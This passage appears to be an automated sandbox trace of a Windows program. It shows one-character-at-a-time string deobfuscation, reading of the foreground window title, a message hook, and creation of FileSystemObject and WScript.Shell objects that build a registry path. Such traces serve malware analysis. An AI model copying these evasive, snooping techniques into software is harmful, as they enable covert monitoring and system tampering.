pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.589] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.589] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.590] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.590] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.590] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.590] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.591] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.591] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.592] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.592] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.596] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.597] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0166.597] GetForegroundWindow () returned 0x102c2 [0166.597] GetLastError () returned 0x0 [0166.597] SysStringLen (param_1=" ") returned 0xff [0166.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.597] SysStringLen (param_1=" ") returned 0xff [0166.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.598] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.598] GetLastError () returned 0x0 [0166.598] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.598] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.598] SysStringLen (param_1="Ac") returned 0x2 [0166.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0x115974c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0166.599] SetWindowTextA (hWnd=0x103c4, lpString="Ac") returned 1 [0166.599] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0166.599] GetFocus () returned 0x0 [0166.599] lstrlenA (lpString="Ac") returned 2 [0166.599] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x115974c) returned 0x1 [0166.600] IsWindow (hWnd=0x103c4) returned 1 [0166.600] IsWindow (hWnd=0x103c4) returned 1 [0166.600] IsWindow (hWnd=0x103c4) returned 1 [0166.600] IsWindow (hWnd=0x103c4) returned 1 [0166.600] GetFocus () returned 0x0 [0166.601] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0166.601] GetFocus () returned 0x0 [0166.601] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0166.601] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0166.601] GetFocus () returned 0x0 [0166.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0166.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x115974c, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0166.601] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.601] VarBstrCmp (bstrLeft="Ac", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0166.602] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0166.602] PeekMessageA (in: lpMsg=0x28fde8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28fde8) returned 1 [0166.602] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28fd4c) returned 0x0 [0166.602] TranslateMessage (lpMsg=0x28fde8) returned 0 [0166.603] DispatchMessageA (lpMsg=0x28fde8) returned 0x1 [0166.603] GetExitCodeThread (in: hThread=0x124, lpExitCode=0x28fcc0 | out: lpExitCode=0x28fcc0) returned 1 [0166.603] ResumeThread (hThread=0x124) returned 0x0 [0166.603] SetThreadPriority (hThread=0x124, nPriority=0) returned 1 [0166.604] PeekMessageA (in: lpMsg=0x28fde8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28fde8) returned 1 [0166.604] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28fd4c) returned 0x0 [0166.604] IsWindow (hWnd=0x103ba) returned 1 [0166.604] GetWindowLongA (hWnd=0x103ba, nIndex=-16) returned 1140916224 [0166.604] IsIconic (hWnd=0x103b8) returned 0 [0166.604] GetParent (hWnd=0x103ba) returned 0x103b8 [0166.604] TranslateMessage (lpMsg=0x28fde8) returned 0 [0166.604] DispatchMessageA (lpMsg=0x28fde8) [0166.604] KillTimer (hWnd=0x103ba, uIDEvent=0x103ba) returned 1 [0166.605] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f59c | out: lpclsid=0x28f59c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0166.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0166.605] CoCreateInstance (in: rclsid=0x28f59c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f640 | out: ppv=0x28f640*=0xf22be0) returned 0x0 [0166.681] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f650 | out: ppvObject=0x28f650*=0x0) returned 0x80004002 [0166.681] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f654 | out: ppvObject=0x28f654*=0x0) returned 0x80004002 [0166.681] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f620 | out: ppvObject=0x28f620*=0xf22be0) returned 0x0 [0166.681] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x1 [0166.682] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22be0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f5ec*="getspecialfolder", cNames=0x1, lcid=0x409, rgDispId=0x28f5f0 | out: rgDispId=0x28f5f0*=10014) returned 0x0 [0166.682] FileSystemObject:IDispatch:Invoke (in: This=0xf22be0, dispIdMember=10014, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f5c0*(rgvarg=([0]=0x28f648*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f848, pExcepInfo=0x28f5a0, puArgErr=0x28f5d0 | out: pDispParams=0x28f5c0*(rgvarg=([0]=0x28f648*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f848*(varType=0x9, wReserved1=0x0, wReserved2=0xf650, wReserved3=0x28, varVal1=0xf22c3c, varVal2=0x0), pExcepInfo=0x28f5a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5d0*=0x72a478d9) returned 0x0 [0166.683] FileSystemObject:IUnknown:AddRef (This=0xf22c3c) returned 0x2 [0166.683] FileSystemObject:IUnknown:Release (This=0xf22c3c) returned 0x1 [0166.683] CLSIDFromProgIDEx (in: lpszProgID="Wscript.Shell", lpclsid=0x28f59c | out: lpclsid=0x28f59c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0166.692] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0166.692] CoCreateInstance (in: rclsid=0x28f59c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f640 | out: ppv=0x28f640*=0xf22d4c) returned 0x0 [0166.818] WshShell:IUnknown:QueryInterface (in: This=0xf22d4c, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f650 | out: ppvObject=0x28f650*=0x0) returned 0x80004002 [0166.818] WshShell:IUnknown:QueryInterface (in: This=0xf22d4c, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f654 | out: ppvObject=0x28f654*=0x0) returned 0x80004002 [0166.818] WshShell:IUnknown:QueryInterface (in: This=0xf22d4c, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f620 | out: ppvObject=0x28f620*=0xf22d38) returned 0x0 [0166.818] WshShell:IUnknown:Release (This=0xf22d4c) returned 0x1 [0166.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.819] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0166.819] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.819] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0166.819] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.820] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0166.820] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.820] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0166.820] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.820] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0166.821] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.821] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0166.821] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.821] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0166.822] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.822] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0166.822] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.822] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0166.823] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.823] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0166.823] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.823] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0166.823] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.824] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0166.824] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.824] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0166.824] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.824] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0166.824] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.825] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0166.825] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f870, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0166.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.825] VarSub (in: pvarLeft=0x28fa30, pvarRight=0x28f818, pvarResult=0x28f848 | out: 